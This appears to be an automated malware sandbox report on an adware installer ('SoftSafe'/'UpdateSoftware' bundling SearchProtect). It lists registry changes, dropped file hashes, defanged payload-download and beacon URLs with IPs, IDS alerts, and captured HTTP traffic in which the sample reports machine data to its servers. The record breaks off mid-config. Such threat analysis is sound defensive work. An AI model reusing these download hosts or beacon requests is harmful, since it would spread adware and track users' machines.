"NP6yu5 mGMVNpnikg0UES4we2P15TB9y" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 kzHwZuJLFHw5Fr3FSOzPpISE/F" = "NP6yu5 vnNnZzG xztBe7qNMhrU5nv7p2jg3MSoGKR2AOifGjaisEzPiKveJre7eC2osjAxko/vUyvZtN4IYuES3zz9TinpNYuYzUZrmzq09xRJjuTq5AlcMd3b9ymQA4IBVY581FGF0U3Y qvoIHd3yitOyzlhhUG9isJtU cLS4On UnxKakKxqiq7s2UoJE3nd3krWq 9v5e1lcOEFzZuwR0C5G0Buk1ekwXnca4/GyWLQ0RKA9/gnyRwN doQEiqxnReBKT7HtpltL5cigNEXkGeb6N3PGb6 KyXobYwYER8wYBbGekIO59ZF2 v3RA rA9WcH4txlPPE9YV8gwJ1qDAFwj/PZPKgcu2OOVdZjePKZtQKwHQzU0RtDHELJESORhEr2Tb bhyJwiujYtSlzFVmWr9noi3dhI8YGcrw XL7KqDHuJCUbSKlV3Y4qrbtWHvv8m5nZ93LHYjJcoiD3QD8ZTuqjowIP0PH1FyNY3/n"
"NP6yu5 jJE/mnBCDWYvA42sczUv9SClfrqvZXt8sBARO" = "NP6yu5 qaAnCQDWYSUGOC2EC0BO122uP"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"NoModify" = "1"

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 mA7A/0RJLFH3oCqCND9QOs7c7LJLxGmTX4Y5fn0nd" = "NP6yu5 xztvqomjlha"
"NP6yu5 zUPS3jlhabcQDMNIScd6AO3aDxmTq1WIaX6" = "NP6yu5 tQ3dtOHwysu7dAPo9rWzs6Cz73val5GwlYqnEmAXyKRiEzz 0sbZtS5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"DisplayName" = "UpdateSoftware"

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 tJp3sbqomjlSvJfgkDPgofAaSAq8LeS0XEI" = "NP6yu5 nsOVqgsurpn3luw"
"NP6yu5 imD09G789/XrRUo/jOxMoD5p8s7z6" = "NP6yu5 owmZMztvqom44"
"NP6yu5 y9R/xAztvqoWETd7yHx7kCFYzD24sLA" = "NP6yu5 xztvqomjlha"
"NP6yu5 rOHR67habcdI6oQitBZylEDlKv" = "NP6yu5 ookVA701234YHM8"
"NP6yu5 pNrKTFbcdefEjL8Z1TlnENCpBpb" = "NP6yu5 p97ufSUMOQItTzRI6FRPyp"
"NP6yu5 m493B1JLFHwfSLP0cq" = "NP6yu5 p97ufSUMOQItTzRI6FRPyp"
"NP6yu5 t5w/eBhabcdLg7/sFSAaTxRvG" = "NP6yu5 xvTqlqdefABK 80Gq2mWBC1o0 "
"NP6yu5 qAAIJrpnikgVSUoLaz3mK8u RgKbxPY" = "NP6yu5 ms6Kogvqomje5FgkwM"
"NP6yu5 o/JAuurpnikZzc72iod641QVSkWTqJSu5zR" = "NP6yu5 rk50XvKEG xeKLvesJcI/uDaKRkMWR2hnutqmBtZdkaLX2fgHL"
"NP6yu5 q2cpRx789/XueIe5iLgmR36Hi9ZR5HNZs2A" = "NP6yu5 p2g4ahLFHwykW"
"NP6yu5 mPpwLQDWYSUoj8v7lBa0 8W0MSmWN4ClWM7" = "NP6yu5 mAzKd789/XZzLMPPGMuVLt9zIJASWw"
"NP6yu5 me6uTVNPRJL13Jfl4Pkq3 KZkkBGDuDhpPPquV" = "NP6yu5 owmZMztvqom44"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 sFynDebcdef tMD" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 vGPjjAfABCDtsHMzvqSfT7E4si" = "NP6yu5 nsOVqgsurpn3luw"
"NP6yu5 u2C5SlhabcdKYXGD2X5Dtp " = "NP6yu5 vCEet 9/XZTFWNaRVti08X5GA"
"NP6yu5 yEFhrM xztvBTqybYrHCKZLQDEDd77yDa71" = "NP6yu5 nWYONZWYSUMmKdWHSyBsxoIXlq8L0acxfPYSvuyukjdQWYOTbm8kHsQ"
"NP6yu5 xyxzUr xztv8XRDd4dOlw/ 0eLrMM" = "NP6yu5 p/RcQikg012CPtvY0JqomLb"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"NoRepair" = "1"

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 s2TbxEefABCxJ0DAXr /fsJdEdZsSHr HV" = "NP6yu5 kdK38OABCDWIHtWKZ5PJuKDRJ"
"NP6yu5 ow1rR56789/ue1sByvUf4kVuix" = "NP6yu5 p2g4ahLFHwykW"
"NP6yu5 jxu9x/ztvqoWwAvzzG1eDHhjPa" = "NP6yu5 mAzKd789/XZzLMPPGMuVLt9zIJASWw"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"InstallDate" = "20130802"

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 q83XdcabcdeK18vAC0H9NVFErZY89qziqz" = "NP6yu5 xvTqlqdefABK 80Gq2mWBC1o0 "
"NP6yu5 xegqyZTVNPRhap40RL5nzk9RVF fIgeuX" = "NP6yu5 ouLGsR/XZTVHZg6"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 95 24 04 27 14 9F F1 15 0F 02 1A D1 03 90 0A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"_In" = "20140802"

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 upBrs456789yYTFdDrzVA0PJHl5GUN4cRRU6I0 /b" = "NP6yu5 ms6Kogvqomje5FgkwM"
"NP6yu5 mGooxrikg01VravP7V/5b68FyY" = "NP6yu5 su8YtQ34567VnKOTlN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"DisplayIcon" = "C:\Windows\System32\msiexec.exe"

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 t3BD56789/Xu4TF4qCfDCBTHm9BO81oA/UPCl" = "NP6yu5 jnxjzOdefABNqu"
"NP6yu5 vbNHYCDWYSUoiK7bPU/LiTlOXXB/Y/8ZsgUeDPvDrC" = "NP6yu5 ouLGsR/XZTVHZg6"
"NP6yu5 sH9 Y xztvq/XYWHIi jTIOMPd" = "NP6yu5 nWYONZWYSUMmKdWHSyBsxoIXlq8L0acxfPYSvuyukjdQWYOTbm8kHsQ"
"NP6yu5 iqFGhLqomjlSrvHfNHJ3oZIgyJwy44WgZ8t" = "NP6yu5 vnNnZzG xztBe7qNMhrU5nv7p2jg3MSoGKR2AOifGjaisEzPiKveJre7eC2osjAxko/vUyvZtN4IYuES3zz9TinpNYuYzUZrmzq09xRJjuTq5AlcMd3b9ymQA4IBVY581FGF0U3Y qvoIHd3yitOyzlhhUG9isJtU cLS4On UnxKakKxqiq7s2UoJE3nd3krWq 9v5e1lcOEFzZuwR0C5G0Buk1ekwXnca4/GyWLQ0RKA9/gnyRwN doQEiqxnReBKT7HtpltL5cigNEXkGeb6N3PGb6 KyXobYwYER8wYBbGekIO59ZF2 v3RA rA9WcH4txlPPE9YV8gwJ1qDAFwj/PZPKgcu2OOVdZjePKZtQKwHQzU0RtDHELJESORhEr2Tb bhyJwiujYtSlzFVmWr9noi3dhI8YGcrw XL7KqDHuJCUbSKlV3Y4qrbtWHvv8m5nZ93LHYjJcoiD3QD8ZTuqjowIP0PH1FyNY3/n"
"NP6yu5 jO7cksRJLFHdItgO4" = "NP6yu5 ookVA701234YHM8"
"NP6yu5 kMSXeBMOQIKhE69m1QE674UDEx" = "NP6yu5 op/1ESUMOQIiA/"
"NP6yu5 qwDMhUjlhabRi95gdx9wB Kt8h" = "NP6yu5 rk50XvKEG xeKLvesJcI/uDaKRkMWR2hnutqmBtZdkaLX2fgHL"
"NP6yu5 s/N9q2LFHwy5Ge3vWafDDyM0XgIXL/SocfUpBEc2iz" = "NP6yu5 xKYF 812345Z1"
"NP6yu5 oFUvMDbcdefHBbxrMluGJ9Aygj" = "NP6yu5 yZKZjefABCDz76N9UmHe0p0kgH5NGRfwxzCZGcCt9/G/oGfA6jw"
"NP6yu5 qmagWavqomjYke3rg3RaIWgtRR6ly542b" = "NP6yu5 vCEet 9/XZTFWNaRVti08X5GA"
"NP6yu5 oxTCwROQIKEbfoQmXOVq3pyCV" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 u4W7I3FHwysfpPWVEc640Vgj7vuI5FRvR" = "NP6yu5 xKYF 812345Z1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"UninstallString" = "c:\documents and settings\all users\application data\softsafe\updatesoftware\updatesoftware.exe /uninstall"

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 uGnmtBCDWYSqb6jM/jZxaHmJs4bb/qRin 8" = "NP6yu5 zuPIYS89/XZFjB3nocNRH61"
"NP6yu5 xh2uW4Hwysu7Ssr8oWZx2xW2hDd4djxqbX" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 r 8G2h34567HEDrcOMl 7 u93c" = "NP6yu5 zuPIYS89/XZFjB3nocNRH61"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"DisplayVersion" = "3.3.0.1309"

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 xGCT2oqomjlV2gRnCoLMWn7nyn" = "NP6yu5 tQ3dtOHwysu7dAPo9rWzs6Cz73val5GwlYqnEmAXyKRiEzz 0sbZtS5"

Dropped PE files

MD5	File path
af7ce801c8471c5cd19b366333c153c4	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Tsu905D28F2.dll
02c162fd7706e887624dfcc410979355	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nshBF.exe
7f6b1c9c1e9b1b936b8a6c44e7588063	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsoBA.tmp
02c162fd7706e887624dfcc410979355	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsuC3.exe
23912df27a61ea0463c5509ba6a97579	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons\putfu.exe
0b813086a3400aafa1639d08823fbd46	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons\sp-downloader.exe
9dfbb035592ea044a4b29977a3f272ff	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons\usetup.exe
d1f319803ffc36548f3a2a3078db5fe3	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Custom.dll
e717f6ce3a7429bfa6d7f3cf66737a4b	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.exe
b4ef2fa4426becd8ef546258ceb206b7	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\_Setup.dll
6fd673efd6e4d460318c4f9ee43367c8	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spstub[1].exe
23912df27a61ea0463c5509ba6a97579	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tpq[1].exe
7f6b1c9c1e9b1b936b8a6c44e7588063	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\SPSetup[1].exe
9dfbb035592ea044a4b29977a3f272ff	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\agup[1].exe
0b813086a3400aafa1639d08823fbd46	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sp-downloader[1].exe
d4d1cc69e363813c14f289694756aa1e	c:\Program Files\ProgramUpdater\Assistant.dll
348bd6c1565bd5f85ed13b56d2401f05	c:\Program Files\ProgramUpdater\AssistantSvc.dll
fe11b14440be254f685acbb7fd62a966	c:\Program Files\SearchProtect\Main\bin\CltMngSvc.exe
437467dfb9cf21c183acf3e67a9e424c	c:\Program Files\SearchProtect\Main\bin\SPTool.dll
aaec330e1fb52dae0d09a73d522e8c9a	c:\Program Files\SearchProtect\Main\bin\uninstall.exe
b5f8de75260f7113d5191270cb557da9	c:\Program Files\SearchProtect\SearchProtect\bin\SPTool64.exe
0321511cbfb7315afe0108fbd0b80df1	c:\Program Files\SearchProtect\SearchProtect\bin\SPVC32.dll
8898fee7a02e3d3bf63167d068af6ac3	c:\Program Files\SearchProtect\SearchProtect\bin\SPVC32Loader.dll
4b65a420b108f3418fe6d3cdb64a226e	c:\Program Files\SearchProtect\SearchProtect\bin\SPVC64.dll
6c5c6ae63ee4d7e88eb846e36b06eace	c:\Program Files\SearchProtect\SearchProtect\bin\SPVC64Loader.dll
f179d39cdc9c25f28f0a2510fc96266c	c:\Program Files\SearchProtect\SearchProtect\bin\cltmng.exe
ffe156d694dd7583948cb96dcfac5a3d	c:\Program Files\SearchProtect\UI\bin\cltmngui.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: SoftSafe
Product Name: SoftSafe
Product Version: 1.0.0.1
Legal Copyright: Copyright (c) 2012 SoftSafe
Legal Trademarks:
Original Filename: TSULoader.exe
Internal Name: TSULoader
File Version: 2013.4.21.1505
File Description: Installer for SoftSafe
Comments: WinNT (x86) Unicode Lib Rel
Language: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	7672	7680	4.5056	b1ae6dcdc3a7ba319c6d5e0b1a2eadbc
.rdata	12288	1794	2048	3.26018	cd4f20f041a2da05dfe5974fe61bd4ec
.data	16384	1040	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	20480	8288	8704	3.02754	7fb2e9f5274919825402377c03c83fed
.reloc	32768	348	512	2.09579	938152484b33bca77bd622973abb524e
.tsustub	36864	120955	121344	5.54288	9c583a14d4612420371a949372873fe7
.tsuarch	159744	144896	144896	5.54321	880ff51a584fe29f2de4fa39efe3d924

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 5772
0d247883949c00d2cf6b602c27f4916d
e412e2bcbf16e7c9139c83fda4e36f5b
98b18296e3c8a52e1f1e8f7f20cd9fb8
4166ff38501f8c7b5402097cafc922fb
7fc38e45fbf6a4242857bfbb5f774be7
ed1b5c70c1ece7fd2d360754577ab278
7bee12648483a51960e73c2b3d2a77e1
170fce66d866070c75d12413d51ec860
99d19113c1ebe160c802234c58568fe4
8a7144f7f454d2aade092229821ae6a8
790af56970b0d1771791447c9a6b8671
1531a7b66260649808e2c6fb21e582d6
207600d2996289ce5f7307e8ea48492a
e1f955ea38bafa3630513c770e0e7389
dffa8b3cb8b5ab4239e433ba5ec4e34c
befdc049baa90e1f7f3872e5e7494304
21b7d36e5544e155c28fc10283b3861c
3f77c4b2c50bc7655aeb3fc620f5afc0
2a9cc014326a3f4ca20bb6c7195d0584
8e81de065a044ea2e2f5f639877ed86f
757d48107f1be738bf017ede2cc278ad
e2ff66ea955bcd40da4eddb3cf2ea52a
be9f1cd4fa01014b7e9505ff31af2e45
175b6fd90870700f1bd91fcae8d55c63
fe2e08e45a75cca4ad42e8a61598ac8a

URLs

URL	IP
hxxp://installbox1.info/?step_id=1&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=*
hxxp://installbox1.info/?step_id=2&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=*
hxxp://installbox1.info/images/general_logo.bmp
hxxp://installbox1.info/?step_id=3&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=*
hxxp://e6337.g.akamaiedge.net/sp-downloader.exe
hxxp://Jazz-1846647836.us-east-1.elb.amazonaws.com/
hxxp://e9287.g.akamaiedge.net/stub/spstub.exe
hxxp://sp-download.va.spccint.com/download/CarrierId/CT3309297/CarrierVersion/DEFAULT/CarrierType/ctid/Brand/SP
hxxp://e9287.g.akamaiedge.net/Installer/2.16.10.61/SPSetup.exe
hxxp://e3937.g.akamaiedge.net/spinstallersettings/2.16.10.61/test/ABTEST_SETTINGS_ID/carrierId/CT3309297
hxxp://installbox1.info/?report_version=5&
hxxp://sp-ip2location.va.spccint.com/ip/?client=sp
hxxp://a1015.g1.akamai.net/UP/settings/?ctid=CT3309297&UM=&c=CA&DUM=2
hxxp://installbox1.info/?step_id=4_2&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=*
hxxp://installbox1.info/addons/dfndr/180/tpq.exe
hxxp://datadownloadscan.info/get/?data=0BIqmZDY2uCNUO3ZTV47GddPvdyzkDVy+7LVMeiWPYiBnCaj7k5VmXKWI1PAmmSZgMSm0PBWd+AnT1E+ZQB16S/DiF+4fQvCbJ4VtAbtEkcTRdGLtOnGtxlnAjTmF29P02pymuZ0juTFPgy+HLQK909FbEdw4mVH+2P0HYsvyvhUPv375adfwI9Jyas2SEptJZhWja+RPXUMh0JkfAV4d311MD3ax3iE83oTL5ZzvJIdGyqIVbcsAi9qZyFbes0e/tD4t4SKs6wr2H8DmWcO67q38oNx+Sjmb80MxaLStTzP1sNUuKGHBdH9rZgNB/p3YWcakrG4mxDarwAZZ7JqQr4iPemyDeSdNKOq9UylOMsaP3dc7dVWAfI8hWCSqeWPOYtijjdt4KTWGFQP3jLhEKYt6QCilzBXEsdQbQMSoK1j0a0U2CN8xbl5wn1OzIZjkg4hgbatgSr13yPyusR/RI7SKQ50xtOKstDtw/AOpESdJvqcHU60CYuxZTVN&version=4	162.210.192.21
hxxp://installbox1.info/?step_id=4_3&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=*
hxxp://installbox1.info/addons/agup.exe
hxxp://sp-storage.spccinta.com/Installer/2.16.10.61/SPSetup.exe	23.9.111.99
hxxp://c1.installbox1.info/?step_id=2&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=*	54.191.186.103
hxxp://sp-download.spccint.com/download/CarrierId/CT3309297/CarrierVersion/DEFAULT/CarrierType/ctid/Brand/SP	199.101.114.124
hxxp://i1.installbox1.info/images/general_logo.bmp	54.191.186.103
hxxp://i1.installbox1.info/addons/dfndr/180/tpq.exe	54.191.186.103
hxxp://c1.installbox1.info/?step_id=4_3&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=*	54.191.186.103
hxxp://r2.monitorbox1.info/?report_version=5&	54.191.186.103
hxxp://c1.installbox1.info/?step_id=3&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=*	54.191.186.103
hxxp://sp-storage.conduit-services.com/sp-downloader.exe	23.9.99.152
hxxp://c.api.seccint.com/UP/settings/?ctid=CT3309297&UM=&c=CA&DUM=2	184.84.243.35
hxxp://i1.installbox1.info/addons/agup.exe	54.191.186.103
hxxp://sp-alive-msg.databssint.com/	184.72.217.85
hxxp://c1.installbox1.info/?step_id=4_2&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=*	54.191.186.103
hxxp://sp-ip2location.spccint.com/ip/?client=sp	199.101.114.209
hxxp://c1.installbox1.info/?step_id=1&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=*	54.191.186.103
hxxp://sp-installer.databssint.com/	54.243.179.104
hxxp://sp-settings.spccint.com/spinstallersettings/2.16.10.61/test/ABTEST_SETTINGS_ID/carrierId/CT3309297	23.9.97.214
hxxp://sp-storage.spccinta.com/stub/spstub.exe	23.9.111.99
r1.reportbox1.info	95.211.169.207
c-sp-download.spccint.com	23.9.97.214
sp-autoupdate.spccint.com	23.9.97.214
servicemap.spccint.com	23.9.97.214

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE W32/InstallRex.Adware Initial CnC Beacon
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE W32/InstallRex.Adware Report CnC Beacon
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET USER_AGENTS Suspicious Win32 User Agent
ET MALWARE Adware.Win32/SProtector.A Client Checkin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: sp-installer.databssint.com

Content-Length: 1062

Connection: Keep-Alive

Cache-Control: no-cache

{"event_type":"install_completed","SP_ID":"SP02A809A1-AD66-49FC-9E31-72DC6687025A","SP_version":"2.16.10.61","OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)","OS_version":"5.1","browser":"InternetExplorer","browser_version":"6.0.2900.5512","carrier_type":"ctid","carrier_ID":"CT3309297","carrier_version":"","carrier_userid":"","carrier_UM":"","machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG","hp_takeover":"true","other_takeover":"true","environment":"","sequence_timestamp":"1406946115024","profile_number":"1","user_number":"1", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8", "download_length": 3172, "install_type": "install", "result": "success", "reason": "0","v_env_tests":{"10_ProcessesExists":"0","10_ModuleInjected":"0","10_FakeSPServiceParent":"0","12_ProcessesExists":"0","12_StatusKeyExists":"0"},"v_env_codes":{"10":"0","12":"0"},"channel_id": "", "brand": "SP" , "previous_brand":"", "brand_install_type":"cleanmachine","Experiment":"","Variant":""}
HTTP/1.1 202 Accepted

Date: Sat, 02 Aug 2014 07:20:02 GMT

P3P: CP="NOI ADM DEV COM NAV OUR STP"

Server: Apache-Coyote/1.1

Content-Length: 0

Connection: keep-alive

HTTP/1.1 202 Accepted..Date: Sat, 02 Aug 2014 07:20:02 GMT..P3P: CP="N
OI ADM DEV COM NAV OUR STP"..Server: Apache-Coyote/1.1..Content-Length
: 0..Connection: keep-alive..

POST /?report_version=5& HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: TixDll

Host: r2.monitorbox1.info

Content-Length: 547

Cache-Control: no-cache

data=A3EmlG/I75WJLly89/0yV5rzHXMaYBH5s1RblGeLdTQm7lO5//cpa9b/FrrftHzeCbhgmgcg7YlcCHRMxmiUmqEq4L6TSniNwnf5MFdxM6DGWyia2UCU8DIglw06O5NlVr6NsvTUORcnD1k3oOwe36bvzOQY0ALPK9/9hxuY+hJO4Gq1kEuTaqddJp891b2jJ0/dKXaPMcTfOWtTMT/h+ERcYwOhzYZZXf5N7Y0+ZhObUttuvUMTzA+AC9XkLi23QCTILN+ysIb5R3IBTJ9GD9WXuFIzmK+ZvCs90/swyNt2aITeduHF6PkLVKEoMpcSEyuGIIaTDc6smg3cujTmHNW56VnsvGtNZJXGO5Wfl9qK9Ru+TJIoZARKTC8e8dqFtNseO40PhKJl+XlzYxiTkIDlE1kYHfJPSy1LuDa2yf/+5CkgIdZGgbTui0Z1eRsVnkd9HNHgr3HifZciV0ld7qksCLq0RORmFp/M50MkXOU86sto8+AK+F1TIG249JNTmPfoKtbc
HTTP/1.1 200 OK

Server: openresty

Date: Sat, 02 Aug 2014 07:19:44 GMT

Content-Type: application/json; charset=UTF-8

Content-Length: 2

Connection: close
{}..

GET /?step_id=4_2&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=* HTTP/1.1

Accept: */*

User-Agent: TixDll

Host: c1.installbox1.info

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: openresty

Date: Sat, 02 Aug 2014 07:20:04 GMT

Content-Type: text/html

Content-Length: 9090

Connection: close

Content-Disposition: attachment; filename="4_2.txt"
..[.I.n.s.t.a.l.l.e.r.]...P.r.o.d.u.c.t.N.a.m.e.=.".S.e.t.u.p."...P.r.
o.d.u.c.t.V.e.r.s.i.o.n.=.".1...0."...P.r.o.d.u.c.t.C.o.d.e.=.".3.4.a.
0.9.f.3.2.-.9.9.0.6.-.4.5.1.5.-.9.4.3.a.-.8.7.7.9.5.d.0.b.a.a.6.d."...
P.u.b.l.i.s.h.e.r.I.D.=.".3.8.8."...S.o.u.r.c.e.I.D.=.".0."...P.a.g.e.
I.D.=.".0."...A.f.f.i.l.i.a.t.e.I.D.=.".1._.e.x.e."...I.n.s.t.a.l.l.e.
r.I.D.=.".9.3.2.4.4.7.4.0.4."...L.o.c.a.l.e.=.".<.L.a.n.g.u.a.g.e.&
gt;."...D.a.t.e.=.".2.0.1.4./.0.8./.0.2."...T.i.m.e.=.".7.:.2.0.:.0.4.
"...S.h.o.w.I.n.T.a.s.k.b.a.r.=.".1."...H.i.d.e.S.c.r.e.e.n.s.=.".0.".
..R.u.n.O.n.c.e.=.".1."...L.o.g.U.r.l.=."."...L.o.g.S.t.a.r.t.e.d.=.".
"...L.o.g.F.i.n.i.s.h.e.d.=."."...L.o.g.B.e.f.o.r.e.S.e.n.d.R.e.p.o.r.
t.=."."...L.o.g.A.f.t.e.r.S.e.n.d.R.e.p.o.r.t.=.".".....[.S.e.r.v.e.r.
]...I.D.=.".3."...L.o.c.a.t.i.o.n.=.".D.E.".....[.U.s.e.r.I.n.f.o.]...
C.o.u.n.t.r.y.C.o.d.e.=.".U.S."...I.P.A.d.d.r.e.s.s.=.".1.8.4...1.0.7.
..3.8...3.8."...W.e.b.B.r.o.w.s.e.r.=.".4.".....[.R.n.d.G.e.n.]...P.e.
r.c.e.n.t.a.g.e.=.".9.".....[.S.c.r.e.e.n.7.6.]...T.i.t.l.e.=.".S.e.t.
u.p."...B.u.t.t.o.n.1.=.".T.r.y. .A.g.a.i.n."...B.u.t.t.o.n.2.=.".C.a.
n.c.e.l."...L.a.b.e.l.1.=.".W.e.'.r.e. .s.o.r.r.y.:. .t.h.e. .d.o.w.n.
l.o.a.d. .l.i.n.k. .s.e.e.m.s. .t.o. .b.e. .b.r.o.k.e.n... .P.l.e.a.s.
e. .v.i.s.i.t. .t.h.e. .a.u.t.h.o.r.'.s. .h.o.m.e.p.a.g.e. .f.o.r. .f.
